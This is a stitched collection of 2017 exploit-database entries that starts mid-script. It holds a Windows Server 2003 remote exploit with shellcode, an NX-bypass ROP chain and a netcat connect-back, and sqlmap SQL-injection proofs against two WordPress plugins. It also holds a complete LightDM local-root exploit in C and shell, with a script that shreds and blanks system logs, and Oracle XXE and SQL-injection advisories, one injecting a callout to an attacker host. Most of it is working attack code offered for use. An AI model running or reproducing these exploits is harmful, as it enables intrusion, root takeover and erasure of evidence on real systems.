buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c" #ret 20
rop += "\x71\x42\x38\x77" #jmp esp
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c" #Disable NX routine
rop += "\x90"*4
stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12" #Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes
dce.call(0x1d, stub) #0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
# Exploit Title: Wow Viral Signups v2.1 WordPress Plugin SQL Injection
# Date: 29/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Wow Viral Signups v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'idsignup' is vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=mwp_signup_send&email=GING%40MAIL.RU&hvost=%3Fpage_id%3D47&idsignup=1" --dbs --threads=10 --random-agent --dbms mysql
Parameter: idsignup (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND 5272=5272
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hXXu)
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.1
6. Disclosure timeline
15-Mar-2017 - found the vulnerability
15-Mar-2017 - informed the developer
29-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.
# Exploit Title: Wow Forms v2.1 WordPress Plugin SQL Injection
# Date: 29/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Wow Forms v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'wowformid' is vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=send_mwp_form&arrkey%5B%5D=mwp-field-0&arrkey%5B%5D=mwp-forms-textarea-0&arrval%5B%5D=form2&arrval%5B%5D=rrr&mwpformid=1*" --dbs --threads=10 --random-agent --dbms mysql
Parameter: Array-like #6* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND 6968=6968
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))gxQa)
Type: UNION query
Title: Generic UNION query (NULL) - 65 columns
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x6b656f4d516d7a6b736f596f49746d4e776a7663716f4d41654c6e516e516c6c6c7a5274744a6d57,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL— -
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.1
6. Disclosure timeline
15-Mar-2017 - found the vulnerability
15-Mar-2017 - informed the developer
29-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.
Source: https://blogs.securiteam.com/index.php/archives/3134
Vulnerability Summary
The following advisory describes a local privilege escalation via LightDM
found in Ubuntu versions 16.10 / 16.04 LTS.
Ubuntu is an open source software platform that runs everywhere from IoT
devices, the smartphone, the tablet and the PC to the server and the
cloud. LightDM is an X display manager that aims to be lightweight, fast,
extensible and multi-desktop. It uses various front-ends to draw login
interfaces, also called Greeters.
Credit
An independent security researcher, G. Geshev (@munmap), has reported this
vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor Responses
The vendor has released a patch to address this issue.
For more information: https://www.ubuntu.com/usn/usn-3255-1/
CVE Details
CVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358>
Vulnerability Details
The vulnerability is found in *LightDM*, which is the Ubuntu’s default
desktop manager, more specifically in the guest login feature. By default
*LightDM* allows you to log into a session as a temporary user. This is
implemented in a script called ‘*guest-account*‘.
@ubuntu:~$ ls -l /usr/sbin/guest-account
-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account
@ubuntu:~$ dpkg -S /usr/sbin/guest-account
lightdm: /usr/sbin/guest-account
@ubuntu:~$ dpkg -s lightdm
Package: lightdm
Status: install ok installed
Priority: optional
Section: x11
Installed-Size: 672
Maintainer: Robert Ancell <robert.ancell@ubuntu.com>
Architecture: amd64
Version: 1.19.5-0ubuntu1
Provides: x-display-manager
Depends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>=
1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6
, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14),
libpam-modules, plymouth (>= 0.8.8-0ubuntu18)
Pre-Depends: dpkg (>= 1.15.7.2)
Recommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde-
greeter
Suggests: bindfs
Conflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0
Conffiles:
/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf
/etc/apparmor.d/abstractions/lightdm_chromium-browser
e1195e34922a67fa219b8b95eaf9c305
/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb
/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf
b76b6b45d7f7ff533c51d7fc02be32f4
/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188
/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e
/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e
/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9
/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22
/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf
/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9
Description: Display Manager
LightDM is a X display manager that:
* Has a lightweight codebase
* Is standards compliant (PAM, ConsoleKit, etc)
* Has a well defined interface between the server and user interface
* Cross-desktop (greeters can be written in any toolkit)
Homepage: https://launchpad.net/lightdm
@ubuntu:~$
The script runs as root when you view the login screen, also known as a
greeter, to log in as a guest. Ubuntu’s default greeter is Unity Greeter.
*Vulnerable code*
The vulnerable function is ‘*add_account*‘.
35 temp_home=$(mktemp -td guest-XXXXXX)
36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]')
37 GUEST_USER=${GUEST_HOME#/tmp/}
38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME}
The guest folder gets created using ‘mktemp’ on line 35. The attacker can
use ‘*inotify*‘ to monitor ‘*/tmp*‘ for the creation of this folder.
The folder name will likely contain both upper and lower case letters. Once
this folder is created, we grab the folder name and quickly and create the
equivalent folder with all letters lower case.
If we manage to race the ‘*mv*‘ command on line 38, we end up with the
newly created home for the guest user inside the folder we own.
Once we have the guest home under our control, we rename it and replace it
with a *symbolic link* to a folder we want to take over. The code below
will then add the new user to the OS. The user’s home folder will already
point to the folder we want to take over, for example ‘*/usr/local/sbin*‘.
68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext "Guest")
--user-group --shell /bin/bash ${GUEST_USER} || {
69 rm -rf ${GUEST_HOME}
70 exit 1
71 }
The attacker can grab the newly created user’s ID and monitor ‘
*/usr/local/sbin*‘ for ownership changes. The ownership will be changed by
the following ‘*mount*‘.
78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || {
79 rm -rf ${GUEST_HOME}
80 exit 1
81 }
We will remove the symbolic link and create a folder with the same name –
to let the guest user to log in. While the guest is logging in, his path
for finding executable files will include ‘*bin*‘ under his home folder.
That’s why we create a new symbolic link to point his ‘*bin*‘ into a folder
we control. This way we can force the user to execute our own code under
his user ID. We use this to log out the guest user from his session which
is where we can gain root access.
The logout code will first execute the following code:
156 PWENT=$(getent passwd ${GUEST_USER}) || {
157 echo "Error: invalid user ${GUEST_USER}"
158 exit 1
159 }
This code will be executed as the owner of the script, i.e. root. Since we
have already taken over ‘*/usr/local/sbin*‘ and have planted our own ‘
*getent*‘, we get to execute commands as root at this point.
Note – We can trigger the guest session creation script by entering the
following two commands.
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
switch-to-guest
Proof of Concept
The Proof of Concept is contains 9 files and they will take advantage of
the race conditions mentioned above.
1. kodek/bin/cat
2. kodek/shell.c
3. kodek/clean.sh
4. kodek/run.sh
5. kodek/stage1.sh
6. kodek/stage1local.sh
7. kodek/stage2.sh
8. kodek/boclocal.c
9. kodek/boc.c
By running the following scripts an attacker can run root commands:
@ubuntu:/var/tmp/kodek$ ./stage1local.sh
@ubuntu:/var/tmp/kodek$
[!] GAME OVER !!!
[!] count1: 2337 count2: 7278
[!] w8 1 minute and run /bin/subash
@ubuntu:/var/tmp/kodek$ /bin/subash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
If the exploit fails, you can simply run it again.
Once you get your root shell, you can optionally clean any exploit files
and logs by executing the below.
root@ubuntu:/var/tmp/kodek# ./clean.sh
/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such
file or directory
Do you want to remove exploit (y/n)?
y
/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a
directory
root@ubuntu:/var/tmp/kodek#
boc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <pwd.h>
#define EVENT_SIZE(sizeof(struct inotify_event))
#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
int main(void) {
struct stat info;
struct passwd * pw;
struct inotify_event * event;
pw = getpwnam("root");
if (pw == NULL) exit(0);
char newpath[20] = "old.";
int length = 0, i, fd, wd, count1 = 0, count2 = 0;
int a, b;
char buffer[EVENT_BUF_LEN];
fd = inotify_init();
if (fd < 0) exit(0);
wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
if (wd < 0) exit(0);
chdir("/tmp/");
while (1) {
length = read(fd, buffer, EVENT_BUF_LEN);
if (length > 0) {
event = (struct inotify_event * ) buffer;
if (event - > len) {
if (strstr(event - > name, "guest-") != NULL) {
for (i = 0; event - > name[i] != '\0'; i++) {
event - > name[i] = tolower(event - > name[i]);
}
if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
;
if (event - > mask & IN_MOVED_FROM) {
rename(event - > name, strncat(newpath, event - > name, 15));
symlink("/usr/local/sbin/", event - > name);
while (1) {
count1 = count1 + 1;
pw = getpwnam(event - > name);
if (pw != NULL) break;
}
while (1) {
count2 = count2 + 1;
stat("/usr/local/sbin/", & info);
if (info.st_uid == pw - > pw_uid) {
a = unlink(event - > name);
b = mkdir(event - > name, ACCESSPERMS);
if (a == 0 && b == 0) {
printf("\n[!] GAME OVER !!!\n[!] count1: %i count2: %i\n",
count1, count2);
} else {
printf("\n[!] a: %i b: %i\n[!] exploit failed !!!\n", a, b
);
}
system("/bin/rm -rf /tmp/old.*");
inotify_rm_watch(fd, wd);
close(fd);
exit(0);
}
}
}
}
}
}
}
}
boclocal.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <pwd.h>
#define EVENT_SIZE(sizeof(struct inotify_event))
#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
int main(void) {
struct stat info;
struct passwd * pw;
struct inotify_event * event;
pw = getpwnam("root");
if (pw == NULL) exit(0);
char newpath[20] = "old.";
int length = 0, i, fd, wd, count1 = 0, count2 = 0;
int a, b, c;
char buffer[EVENT_BUF_LEN];
fd = inotify_init();
if (fd < 0) exit(0);
wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
if (wd < 0) exit(0);
chdir("/tmp/");
while (1) {
length = read(fd, buffer, EVENT_BUF_LEN);
if (length > 0) {
event = (struct inotify_event * ) buffer;
if (event - > len) {
if (strstr(event - > name, "guest-") != NULL) {
for (i = 0; event - > name[i] != '\0'; i++) {
event - > name[i] = tolower(event - > name[i]);
}
if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
;
if (event - > mask & IN_MOVED_FROM) {
rename(event - > name, strncat(newpath, event - > name, 15));
symlink("/usr/local/sbin/", event - > name);
while (1) {
count1 = count1 + 1;
pw = getpwnam(event - > name);
if (pw != NULL) break;
}
while (1) {
count2 = count2 + 1;
stat("/usr/local/sbin/", & info);
if (info.st_uid == pw - > pw_uid) {
a = unlink(event - > name);
b = mkdir(event - > name, ACCESSPERMS);
c = symlink("/var/tmp/kodek/bin/", strncat(event - > name,
"/bin", 5));
if (a == 0 && b == 0 && c == 0) {
printf("\n[!] GAME OVER !!!\n[!] count1: %i count2:
%i\n[!] w8 1 minute and run /bin/subash\n", count1, count2);
} else {
printf("\n[!] a: %i b: %i c: %i\n[!] exploit failed
!!!\n[!] w8 1 minute and run it again\n", a, b, c);
}
system("/bin/rm -rf /tmp/old.*");
inotify_rm_watch(fd, wd);
close(fd);
exit(0);
}
}
}
}
}
}
}
}
clean.sh
#!/bin/bash
if [ "$(/usr/bin/id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
/bin/rm -rf /tmp/guest-* /tmp/old.guest-*
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern
.log /var/log/audit/audit.log /var/log/lightdm/*
/bin/echo > /var/log/auth.log
/bin/echo > /var/log/syslog
/bin/dmesg -c >/dev/null 2>&1
/bin/echo "Do you want to remove exploit (y/n)?"
read answer
if [ "$answer" == "y" ]; then
/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/*
/bin/rm -rf /var/tmp/kodek
else
exit
fi
run.sh
#!/bin/sh
/bin/cat << EOF > /usr/local/sbin/getent
#!/bin/bash
/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1
/bin/chmod 4111 /bin/subash >/dev/null 2>&1
COUNTER=0
while [ \$COUNTER -lt 10 ]; do
/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1
let COUNTER=COUNTER+1
done
/bin/sed -i 's/\/usr\/lib\/lightdm\/lightdm-guest-session
{/\/usr\/lib\/lightdm\/lightdm-guest-session flags=(complain) {/g' /etc/
apparmor.d/lightdm-guest-session >/dev/null 2>&1
/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2>
&1
/usr/bin/getent passwd "\$2"
EOF
/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1
shell.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <grp.h>
int main(void)
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
setgroups(0, NULL);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "[bioset]", "-pi", NULL);
return 0;
}
stage1.sh
#!/bin/bash
if [ "${PWD}" == "/var/tmp/kodek" ]; then
/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
/usr/bin/killall -9 boc >/dev/null 2>&1
/bin/sleep 3s
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
&1
/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc
/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
/var/tmp/boc
else
echo "[!] run me from /var/tmp/kodek"
exit
fi
stage1local.sh
#!/bin/bash
if [ "${PWD}" == "/var/tmp/kodek" ]; then
/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
/usr/bin/killall -9 boc >/dev/null 2>&1
/bin/sleep 3s
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
&1
/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc
/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
/var/tmp/boc &
/bin/sleep 5s
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
switch-to-guest
else
echo "[!] run me from /var/tmp/kodek"
exit
fi
stage2.sh
#!/bin/sh
/usr/bin/systemd-run --user /var/tmp/run.sh
/bin/cat
#!/bin/sh
/usr/bin/systemd-run --user /var/tmp/run.sh
/bin/sleep 15s
/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/
head -1 | /usr/bin/awk '{ print $1 }'`
Application: Oracle PeopleSoft
Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55
Vendor URL: http://oracle.com
Bug: XXE
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Nadya Krivdyuk (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-020] XXE VIA DOCTYPE in PeopleSoft
PeopleSoftServiceListeningConnector
Advisory ID: [ERPSCAN-17-020]
Risk: high
CVE: CVE-2017-3548
Advisory URL: https://erpscan.com/advisories/erpscan-17-020-xxe-via-doctype-peoplesoft/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XXE
Impact: File disclosure, network discovery
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
A malicious user can modify an XML-based request to include XML
content that is then parsed locally.
4. VULNERABLE PACKAGES
PeopleSoft HCM 9.2 on PeopleTools 8.55
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Nadya Krivdyuk
7. TECHNICAL DESCRIPTION
An attacker can use an XML external entity vulnerability to send
specially crafted unauthorized XML requests, which will be processed
by the XML parser. The attacker can use an XML external entity
vulnerability for getting unauthorised access to the OS file system.
PoC
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: 172.16.2.91:8000
Content-type: text/xml
<!DOCTYPE a PUBLIC "-//B/A/EN" "C:\windows">
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Application: Oracle E-Business Suite
Versions Affected: Oracle EBS 12.2.3
Vendor URL: http://oracle.com
Bug: SQL injection
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Dmitry Chastuhin (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT
Advisory ID: [ERPSCAN-17-021]
Risk: high
CVE: CVE-2017-3549
Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: SQL injection
Impact: read sensitive data, modify data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
The code comprises an SQL statement containing strings that can be
altered by an attacker. The manipulated SQL statement can be used then
to retrieve additional data from the database or to modify the data
without authorization.
4. VULNERABLE PACKAGES
Oracle EBS 12.2.3
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Dmitry Chastuhin
7. TECHNICAL DESCRIPTION
PoC
vulnerable jsp name is iesfootprint.jsp
deployDate = ((request.getParameter("deployDate")) != null) ?
request.getParameter("deployDate") : "";
responseDate = ((request.getParameter("responseDate")) != null) ?
request.getParameter("responseDate") : "";
dscriptName = ((request.getParameter("dscript_name")) != null) ?
request.getParameter("dscript_name") : "";
dscriptId = ((request.getParameter("dscriptId")) != null) ?
request.getParameter("dscriptId") : "";
%>
<%
// Process the data based on params
if (showGraph) {
// Create Query String
StringBuffer query = new StringBuffer("SELECT panel_name,
count_panels, avg_time, min_time, max_time, ");
query.append("\'").append(_prompts[10]).append("\'");
query.append(" Average_Time FROM (SELECT rownum, panel_name,
count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,
count(panel_name) count_panels,
(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000
min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE
dscript_id = ");
query.append(dscriptId);
query.append(" AND start_time between ");
query.append("\'").append(deployDate).append("\'");
query.append(" and ");
query.append("\'").append(responseDate).append("\'");
query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE
rownum < 11");
// Get XMLDocument for the corresponding query and Paint graph
try {
XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());
htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);
Approximate request with SQL injection
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'
AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY
panel_name)) --
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
